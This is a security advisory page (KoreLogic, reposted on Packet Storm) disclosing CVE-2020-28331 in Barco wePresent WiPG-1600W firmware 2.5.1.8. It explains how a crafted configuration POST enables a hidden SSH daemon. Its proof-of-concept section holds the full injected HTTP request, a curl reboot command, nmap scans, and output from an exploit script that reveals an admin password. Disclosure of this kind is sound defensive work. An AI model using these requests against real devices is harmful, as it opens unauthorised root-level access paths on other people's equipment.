exploit the possibilities

Barco wePresent Undocumented SSH Interface

Barco wePresent Undocumented SSH Interface
Posted Nov 20, 2020
Authored by Jim Becher | Site korelogic.com

Barco wePresent WiPG-1600W version 2.5.1.8 has an SSH daemon included in the firmware image. By default, the SSH daemon is disabled and does not start at system boot. The system initialization scripts read a device configuration file variable to see if the SSH daemon should be started. The web interface does not provide a visible capability to alter this configuration file variable. However, a malicious actor can include this variable in a POST such that the SSH daemon will be started when the device boots.

tags | exploit, web
advisories | CVE-2020-28331
MD5 | 86102878b47498e5776df9ed90a4a19a

Barco wePresent Undocumented SSH Interface

Change Mirror Download
KL-001-2020-007 : Barco wePresent Undocumented SSH Interface Accessible Via Web UI

Title: Barco wePresent Undocumented SSH Interface Accessible Via Web UI
Advisory ID: KL-001-2020-007
Publication Date: 2020.11.20
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-007.txt


1. Vulnerability Details

Affected Vendor: Barco
Affected Product: wePresent WiPG-1600W
Affected Version: 2.5.1.8
Platform: Embedded Linux
CWE Classification: CWE-284: Improper Access Control
CVE ID: CVE-2020-28331


2. Vulnerability Description

The Barco wePresent device has an SSH daemon included in the
firmware image. By default, the SSH daemon is disabled and does
not start at system boot. The system initialization scripts read
a device configuration file variable to see if the SSH daemon
should be started. The web interface does not provide a visible
capability to alter this configuration file variable. However,
a malicious actor can include this variable in a POST such
that the SSH daemon will be started when the device boots.


3. Technical Description

The Barco wePresent web UI does not appear to have configuration
options/settings for enabling the SSH service or configuring
system-level accounts on the device. The device does
not have a SSH daemon listening by default. In looking at
the unpacked firmware, there is an SSH daemon init script
(/etc/init.d/S41ssh). The init script starts the SSH daemon
only if a specific value from the device's configuration is
set to "1". Excerpts from the init script:

mode=$(/mnt/AwGetCfg get RD_DEBUG_MODE)

runprocess() {
if [ "$mode" = "1" ]; then
echo "dropbear running" /usr/bin/dropbear
fi
}

The AwGetCfg binry reads the /etc/content/AwDefault.xml file,
and there is a RD_DEBUG_MODE value set in that file. By default
RD_DEBUG_MODE is set to "0" in the firmware.

While the web pages in the web UI do not have apparent ways
to enable SSH, other configuration settings that appear in
the /etc/content/AwDefault.xml file can be modified by the web
UI. So, a configuration change originating from the UI can be
intercepted and modified to set RD_DEBUG_MODE to 1.

Many (all?) configuration changes to the device require a reboot
to take effect. So, another POST has to be sent, using the
"SEID" to reboot the device. After the device comes back up,
the SSH service is indeed running and accepting connections.

The root user is the only system level user that is present
in the firmware by default. A hash for the root account is
present in the /etc/shadow file, but has been resistant to
being cracked thus far.


4. Mitigation and Remediation Recommendation

The vendor has released an updated firmware (2.5.3.12) which
remediates the described vulnerability. Firmware and release
notes are available at:

https://www.barco.com/en/support/software/R33050104


5. Credit

This vulnerability was discovered by Jim Becher (@jimbecher) of
KoreLogic, Inc.


6. Disclosure Timeline

2020.08.24 - KoreLogic submits vulnerability details to
Barco.
2020.08.25 - Barco acknowledges receipt and the intention
to investigate.
2020.09.21 - Barco notifies KoreLogic that this issue,
along with several others reported by KoreLogic,
will require more than the standard 45 business
day remediation timeline. Barco requests to delay
coordinated disclosure until 2020.12.11.
2020.09.23 - KoreLogic agrees to 2020.12.11 coordinated disclosure.
2020.09.25 - Barco informs KoreLogic of their intent to acquire
CVE number for this vulnerability.
2020.11.09 - Barco shares CVE number with KoreLogic and announces
their intention to release the updated firmware
ahead of schedule, on 2020.11.11. Request that KoreLogic
delay public disclosure until 2020.11.20.
2020.11.11 - Barco firmware release.
2020.11.20 - KoreLogic public disclosure.


7. Proof of Concept

$ nmap 192.168.2.200

Nmap scan report for 192.168.2.200
Host is up (0.0035s latency).
Not shown: 988 closed ports
PORT STATE SERVICE
80/tcp open http
389/tcp open ldap
443/tcp open https
515/tcp open printer
1688/tcp open nsjtp-data
3268/tcp open globalcatLDAP
4001/tcp open newoak
5566/tcp open westec-connect
6000/tcp open X11
7000/tcp open afs3-fileserver
7100/tcp open font-service
8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds

To enable SSH service, authenticate to the wePresent
device and click apply (does not even have to be
an actual configuration change). In the POST add
"<name>RD_DEBUG_MODE</name><value>1</value>"

POST /cgi-bin/return.cgi HTTP/1.1
Host: 192.168.2.200
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 520
Origin: https://192.168.2.200
Connection: close
Referer: https://192.168.2.200/cgi-bin/web_index.cgi?lang=en&src=AwDevice.html&rjviSfqdmPuWrZ7z


command=<Send><seid>rjviSfqdmPuWrZ7z</seid><name>WL_PAIRING_ONOFF</name><value>0</value><name>NTP_SYNC</name><value>1</value><name>NTP_SERVER_IP</name><value></value><name>TIME_ZONE</name><value>GMT-8_CH</value><name>PREF_LOGINCODE</name><value>2</value><name>VIDEO_OUT</name><value>4</value><name>VIDEO_RES</name><value>7</value><name>PREF_UNIVERSAL_LOGINCODE</name><value>2113</value><name>ENABLE_DST</name><value>1</value><name>IOS_AIRPLAY_ONOFF</name><value>1</value><name>RD_DEBUG_MODE</name><value>1</value></Send>

And then issue a reboot to the device:
$ curl -k -X POST https://192.168.2.200/cgi-bin/return.cgi -d
'command=<Send><seid>rjviSfqdmPuWrZ7z</seid><Factory>reboot</Factory></Send>'
<return><Factory>RebootOK</Factory></return>

The above steps can be captured in a Python script
(a different SEID was generated by the device):

user@machine:~/wepresent$ ./WePwn.py -h 192.168.2.200
[+] Admin password is: W3Pr3s3nt
[+] SEID is: PqhXbb4jQ2g8T4ss
[+] Enabling SSH Daemon
[+] Rebooting device
[+] Waiting for 60 seconds while device reboots
10...20...30...40...50...60


After the device reboots, the SSH daemon is now running and
listening on port 22/tcp.

$ nmap 192.168.2.200

Nmap scan report for 192.168.2.200
Host is up (0.0037s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
389/tcp open ldap
443/tcp open https
515/tcp open printer
1688/tcp open nsjtp-data
3268/tcp open globalcatLDAP
4001/tcp open newoak
5566/tcp open westec-connect
6000/tcp open X11
7000/tcp open afs3-fileserver
7100/tcp open font-service
8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds

The contents of this advisory are copyright(c) 2020
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
Login or Register to add favorites

File Archive:

December 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    22 Files
  • 2
    Dec 2nd
    33 Files
  • 3
    Dec 3rd
    16 Files
  • 4
    Dec 4th
    22 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close